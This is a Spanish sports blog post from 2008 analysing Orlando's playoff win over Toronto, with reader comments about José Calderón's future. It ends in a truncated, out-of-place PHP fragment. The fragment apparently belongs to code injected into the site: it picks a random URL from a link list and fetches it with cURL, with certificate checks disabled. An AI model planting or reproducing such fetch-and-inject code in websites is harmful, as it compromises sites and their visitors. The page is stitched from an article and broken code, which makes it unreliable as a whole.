Howard destroza a un Toronto desorientado

29 de April de 2008 por TheDeerHunter

Si bien las expectativas de Orlando eran notables al comienzo de la campaña, el desarrollo de la temporada regular y el éxito durante esta primera ronda de eliminatorias las han superado en varios puntos fundamentales. Se esperaba que el nuevo e ilusionante proyecto girara en torno a la figura del prometedor pívot Dwight Howard, que había realizado un más que interesante salto de calidad la temporada pasada. No podíamos imaginar, sin embargo, que fuera a explotar de la forma que lo ha hecho de la mano de su mentor, el legendario Patrick Ewing, alcanzando por momentos categoría de candidato a MVP y números sobrehumanos únicamente al alcance de los pívots más dominantes de los últimos 25 años (y se dice pronto). Fue ya durante el AllStars del año pasado cuando Shaq pareció otorgarle el testigo como señor del juego interior en la NBA. En ese momento, teniendo en cuenta lo difícil que resulta captar jóvenes pívots de solvencia, pocos creíamos que a estas alturas podríamos compararlos casi de tú a tú. Y es que, por condiciones físicas, por carisma y por estilo de juego no habíamos visto nada parecido al “Perro Grande” hasta la fecha.

Era previsible hasta cierto punto la destroza que podía llegar a hacer Howard dentro de la zona al vulnerable juego interior de Toronto a pesar de que algunos ponían sus esperanzas en las supuestas dificultades que podía sufrir el de Orlando defendiendo jugadores altos de corte tan exterior que podían alejarle de su hábitat. Nada más lejos de la realidad, Dwight Howard se ha vuelto a vestir el traje de supermán y ha mostrado las limitaciones de unos jugadores que no están capacitados para cuestionarle. Sin duda, ésta ha sido la clave principal de la derrota de Toronto.

Ya se veía venir que el diseño del equipo erraba en algunos puntos fundamentales y el juego interior del que se ha rodeado a Chris Bosh era uno de los más visibles. Parece que está cerca de demostrarse que la elección de Bargnani fue un error para este equipo. Independientemente de los lamentables números entre los que se ha movido este año no se trata de un jugador que pueda complementar al teórico jugador franquicia de este equipo. Como es natural tampoco en ningún momento Nesterovic podía ser la solución. Ahí es donde Toronto empezó a perder la eliminatoria, en el mismo diseño de la plantilla.

Más grave aún para Toronto que la previsible derrota en la serie ha sido la descomposición de sus mismos fundamentos. La sensación que hemos llegado a tener todos de un equipo sin rumbo, destrozando de una tacada la línea de fichajes, de juego y de comportamiento de la franquicia que tan buena proyección había alcanzado durante estos últimos años. Lástima de dirección de Sam Mitchell desde el apartado técnico y lástima de dirección de TJ Ford y Jose Calderón. Si bien, gracias a una racha de juego sobresaliente durante la lesión de su compañero, a Calderón se le considera algo menos culpable de los problemas del equipo en este sentido, lo cierto es que en el momento clave de la temporada no ha podido evitar verse afectado por la dinámica negativa del asunto. Deberá llevar cuidado, porque no se le perdonará tan fácilmente otra como ésta cuando sea él el que lleve exclusivamente el timón de este o cualquier otro equipo.

Por otro lado, Toronto no ha perdido la cara a la eliminatoria en ningún momento a pesar de todas sus dificultades y su imagen ha mejorado levemente con respecto al nefasto tramo final de la regular, hasta el punto de lograr ilusionar de una forma alucinante a su público. Es más de lo que algunos pensábamos que iba a ocurrir y tiene su mérito. Quizá eso les salve de la quema a alguno de ellos.

Tiempo habrá de destacar los otros pilares del equipo de Orlando comenzando por su flamante “jugador de mayor progresión” y por el fichaje estrella de este año, que aún jugando bien no han brillado tan especialmente en esta serie.

Comenta

3 comentarios a esta entrada

  1. txusma dice:
    #1

    Momento de empezar a pensar en el futuro de Calderon? Se ha de qdar en Toronto? Solo si se va Ford? Se rumorea por ahi que los Suns le haran una buena oferta…

      Citar

  2. TheDeerHunter dice:
    #2

    Lo del tema Calderón es un caramelo envenenado.
    Yo siempre había pensado que Toronto era el sitio ideal para él por filosofía de juego… eso antes de todo lo que ha pasado, claro.

    Lo de ir a Suns estaría bien si pudieramos pensar que tienen un buen proyecto colectivo alrededor suyo… y con un estilo de juego que le pudiera venir bien (que más o menos ha sido lo que buscaba Toronto estos años)

    Yo creo que lo mejor para él sería: Quedarse en Toronto, que tiren a Mitchell, Ford y Bargnani… y (tengo mis dudas) fichen a D’Antoni (Garbajosa daría palmas y todo) un pívot que pueda ayudar a Bosh, sobre todo en defensa e imperativamente un buen 3.

      Citar

  3. Viva_Dirk dice:
    #3

    Espero que solo se quede si largan a TJ Ford. Me temo que aun es demasiado pronto para que dejen de confiar en Bargnani, pero sin duda sería una gran opción buscar un center o un gran alero utilizando a Ford+Bargnani en alguno de los equipos que busca futuro a dia de hoy, como pueda ser Indiana, con Jermaine O’Neal de por medio.

    No creo que fichen a D’Antoni, de hecho, si solucionan pronto el problema del puesto de base confiarán otro año en Mitchell.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>